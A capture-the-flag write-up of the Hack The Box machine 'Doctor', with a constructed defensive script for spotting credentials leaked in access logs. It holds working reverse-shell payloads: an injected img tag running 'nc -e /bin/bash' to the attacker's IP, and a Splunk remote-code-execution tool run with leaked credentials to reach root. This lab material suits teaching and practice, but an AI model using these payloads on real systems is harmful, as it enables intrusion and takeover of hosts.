Doctor

Introduction:
Recon
# nmap -sS -sV -sC -T4 -oN nmap.doctor.txt 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 14:19 EST
Nmap scan report for 10.10.10.209
Host is up (0.015s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.35 seconds

nikto -url http://doctor.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.209
+ Target Hostname: doctor.htb
+ Target Port: 80
+ Start Time: 2020-12-22 15:13:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 4d88, size: 5afad8bea6589, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ 7785 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2020-12-22 15:19:35 (GMT-5) (392 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


 *********************************************************************
 Portions of the server's headers (Apache/2.4.41) are not in
 the Nikto 2.1.6 database or are newer than the known string. Would you like
 to submit this information (*no server specific data*) to CIRT.net
 for a Nikto update (or you may email to [email protected]) (y/n)? y

+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt.net -- Thank you!

Enumeration
root@kinetic:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kinetic

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.209 doctor.htb doctors.htb
Exploitation
Submit a new post containing the following payload:
<img src=http://10.10.14.25/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.25'$IFS'4444')>

[+] Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root adm 204 Jan 2 16:10 /var/log/cups/error_log.1
-rw-r----- 1 root adm 109 Aug 13 08:13 /var/log/cups/error_log.4.gz
-rw-r----- 1 root adm 224 Jan 2 14:08 /var/log/cups/access_log.1
-rw-r----- 1 root adm 204 Sep 18 00:00 /var/log/cups/access_log.7.gz
-rw-r----- 1 root adm 267 Sep 23 15:42 /var/log/cups/access_log.3.gz
-rw-r----- 1 root adm 102 Jan 3 01:24 /var/log/cups/error_log
-rw-r----- 1 root adm 355 Sep 28 15:07 /var/log/cups/access_log.2.gz
-rw-r----- 1 root adm 108 Sep 28 12:12 /var/log/cups/error_log.2.gz
-rw-r----- 1 root adm 118 Sep 15 11:56 /var/log/cups/error_log.3.gz
-rw-r----- 1 root adm 536 Jan 3 00:00 /var/log/cups/access_log
-rw-r----- 1 root adm 190 Sep 19 00:00 /var/log/cups/access_log.6.gz
-rw-r----- 1 root adm 219 Sep 22 10:40 /var/log/cups/access_log.5.gz
-rw-r----- 1 root adm 256 Sep 23 10:46 /var/log/cups/access_log.4.gz
-rw-r----- 1 root adm 460 Sep 15 00:00 /var/log/apache2/error.log.10.gz
-rw-r----- 1 root adm 629 Sep 16 00:00 /var/log/apache2/error.log.9.gz
-rw-r----- 1 root adm 323 Aug 21 13:00 /var/log/apache2/access.log.11.gz
-rw-r----- 1 root adm 671 Jan 3 01:23 /var/log/apache2/error.log
-rw-r----- 1 root adm 21578 Sep 17 16:23 /var/log/apache2/backup
-rw-r----- 1 root adm 668 Sep 28 15:02 /var/log/apache2/access.log.2.gz
-rw-r----- 1 root adm 352 Sep 19 00:00 /var/log/apache2/error.log.6.gz
-rw-r----- 1 root adm 895 Jan 3 00:00 /var/log/apache2/error.log.1

 -> Extracting tables from /home/web/blog/flaskblog/site.db (limit 20)
 --> Found interesting column names in user (output limit 10)
CREATE TABLE user (
 id INTEGER NOT NULL,
 username VARCHAR(20) NOT NULL,
 email VARCHAR(120) NOT NULL,
 image_file VARCHAR(20) NOT NULL,
 password VARCHAR(60) NOT NULL,
 PRIMARY KEY (id),
 UNIQUE (username),
 UNIQUE (email)
)
1, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S



[+] Finding passwords inside logs (limit 70)
Binary file /var/log/apache2/access.log.13.gz matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1001.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1002.journal matches
Binary file /var/log/kern.log.3.gz matches
Binary file /var/log/syslog.5.gz matches
/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
/var/log/auth.log.1:Jan 2 14:08:55 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log.1:Jan 2 14:09:00 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log.1:Jan 2 14:09:01 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log.1:Jan 2 15:18:02 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
/var/log/auth.log.1:Jan 2 15:39:22 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
/var/log/auth.log.1:Jan 2 15:40:08 doctor sudo: web : command not allowed ; TTY=pts/0 ; PWD=/home/web/blog/flaskblog ; USER=root ; COMMAND=list
/var/log/auth.log.1:Jan 2 16:07:14 doctor sshd[51830]: Failed password for invalid user shaun from 10.10.14.8 port 60708 ssh2
/var/log/auth.log.1:Jan 2 16:12:36 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [shaun]
/var/log/auth.log.1:Jan 2 16:12:36 doctor sudo: shaun : command not allowed ; TTY=pts/0 ; PWD=/home/shaun ; USER=root ; COMMAND=list
/var/log/auth.log:Jan 3 01:26:44 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
/var/log/auth.log:Jan 3 01:26:44 doctor sudo: web : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
/var/log/dmesg.0:[ 5.666833] systemd[1]: Started Forward Password Requests to Wall Directory Watch.

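The credential above only became recoverable because the application accepted it in a request URL and Apache wrote that URL to disk, so a defender wants both to find such lines and to stop them from being logged as-is. The following is an added example, not part of the original writeup: a Python scanner over constructed access-log lines modelled on the /var/log/apache2/backup entry, plus a redaction helper that could run before lines are shipped to a log store. The endpoint list and parameter names are assumed policy, not anything from this box.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode
# Apache access-log request line; the target is matched with or without a trailing
# "HTTP/x.y" because the leaked line on this box has none.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})')
# Assumed policy: any query string on a credential endpoint is suspect, and these
# parameter names are secrets wherever they appear.
CREDENTIAL_PATHS = {"/reset_password", "/login", "/register"}
SECRET_KEYS = {"password", "passwd", "token", "secret"}
# Constructed sample lines, modelled on the /var/log/apache2/backup entry above.
SAMPLE_LOG = [
    '10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"',
    '10.10.14.4 - - [05/Sep/2020:11:18:02 +2000] "GET /blog?page=2 HTTP/1.1" 200 5120 "-"',
    '10.10.14.9 - - [05/Sep/2020:11:20:11 +2000] "GET /login?username=alice&password=Hunter2 HTTP/1.1" 302 0 "-"',
    '10.10.14.9 - - [05/Sep/2020:11:21:40 +2000] "POST /login HTTP/1.1" 200 812 "-"',
]

def _parse(line):
    """Return (match, url parts, query params), or None if there is no query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qsl(parts.query, keep_blank_values=True)
    return (m, parts, params) if params else None

def find_leaked_credentials(lines):
    """One finding per request whose query string may carry a secret."""
    findings = []
    for line in lines:
        hit = _parse(line)
        if hit is None:
            continue
        m, parts, params = hit
        reasons = ["query string on credential endpoint"] if parts.path in CREDENTIAL_PATHS else []
        reasons += [f"secret parameter '{k}'" for k, v in params if k.lower() in SECRET_KEYS and v]
        if reasons:
            findings.append({"ip": m.group("ip"), "path": parts.path, "reasons": reasons})
    return findings

def redact(line):
    """Rewrite the request target so secret-bearing query values never reach disk as-is."""
    hit = _parse(line)
    if hit is None:
        return line
    m, parts, params = hit
    scrub_all = parts.path in CREDENTIAL_PATHS
    cleaned = [(k, "REDACTED" if scrub_all or k.lower() in SECRET_KEYS else v) for k, v in params]
    return line.replace(m.group("target"), urlunsplit(parts._replace(query=urlencode(cleaned))), 1)
```

Running find_leaked_credentials over the samples flags the reset_password line and the login line with a password in the query; redact leaves the other two lines untouched.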
Post-exploit/PrivEsc
(py3) eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ python ./PySplunkWhisperer2_remote.py --host doctors.htb --port 8089 --lhost 10.10.14.25 --lport 4455 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/bash '10.10.14.25' '4455''
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpy_uzebkn.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.25:4455/
10.10.10.209 - - [02/Jan/2021 19:50:25] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
Press RETURN to cleanup
[.] Removing app...
[+] App removed
^CTraceback (most recent call last):
  File "/oscp/tools/splunk/SplunkWhisperer2/PySplunkWhisperer2/./PySplunkWhisperer2_remote.py", line 144, in

The first attempt used port 4455 both for the tool's own HTTP server (--lport) and for the reverse shell, so the netcat listener on 4455 never received a connection. The second run drops --lport, letting the tool's server fall back to 8181, and points the payload at a separate listener on 4456.

(py3) eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ python ./PySplunkWhisperer2_remote.py --host doctors.htb --port 8089 --lhost 10.10.14.25 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/bash '10.10.14.25' '4456''
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpsf0xsdta.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.25:8181/
10.10.10.209 - - [02/Jan/2021 19:52:09] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
Press RETURN to cleanup

eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ nc -lvnp 4455
listening on [any] 4455 …
^C
eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ nc -lvnp 4456
listening on [any] 4456 …
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.209] 51458
whoami
root
cd /root
ls
root.txt
cat root.txt
019XXXXXXXXXXXXXXXXXXXXXX0874